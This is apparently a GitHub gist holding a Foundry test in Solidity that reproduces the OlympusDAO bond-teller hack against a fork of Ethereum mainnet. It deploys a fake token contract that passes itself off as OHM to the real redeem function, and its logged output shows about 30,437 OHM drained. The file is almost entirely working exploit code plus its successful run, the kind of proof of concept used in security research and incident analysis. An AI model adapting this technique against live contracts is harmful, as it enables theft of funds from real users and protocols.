Created
April 24, 2023 08:02
-
-
Save jackerleon/91844ad1f399387f77d2628b2f3d7eca to your computer and use it in GitHub Desktop.
Proof of Concept for OlympusDAO hack using Foundry
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// author: https://github.com/jackerleon | |
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.16; | |
import "forge-std/Test.sol"; | |
interface IERC20 { | |
function name() external view returns (string memory); | |
function symbol() external view returns (string memory); | |
function balanceOf(address owner) external view returns (uint256); | |
function decimals() external view returns (uint8); | |
} | |
interface IBondFixedExpiryTeller { | |
function redeem(address token_, uint256 amount_) external; | |
} | |
contract AttackTokenContract { | |
IERC20 OHM = IERC20(0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5); | |
function underlying() external view returns(address) { | |
return address(OHM); | |
} | |
function expiry() external pure returns (uint48 _expiry) { | |
return 1; | |
} | |
function burn(address,uint256) external {} | |
} | |
contract OlympusDAO is Test { | |
IBondFixedExpiryTeller bondExpTeller = IBondFixedExpiryTeller(0x007FE7c498A2Cf30971ad8f2cbC36bd14Ac51156); | |
IERC20 OHM = IERC20(0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5); | |
function setUp() public { | |
vm.createSelectFork("mainnet", 15_794_363); | |
} | |
function testHack() public { | |
address fakeToken = address(new AttackTokenContract()); | |
emit log_named_decimal_uint("[Before Exploit] OHM Balance", OHM.balanceOf(address(this)), OHM.decimals()); | |
bondExpTeller.redeem(fakeToken, 30_437_077_948_152); | |
emit log_named_decimal_uint("[After Exploit] OHM Balance", OHM.balanceOf(address(this)), OHM.decimals()); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Running 1 test for test/OlympusDAO/OlympusDAO.sol:OlympusDAO
[PASS] testHack() (gas: 149266)
Logs:
[Before Exploit] OHM Balance: 0.000000000
[After Exploit] OHM Balance: 30437.077948152
Test result: ok. 1 passed; 0 failed; finished in 698.30ms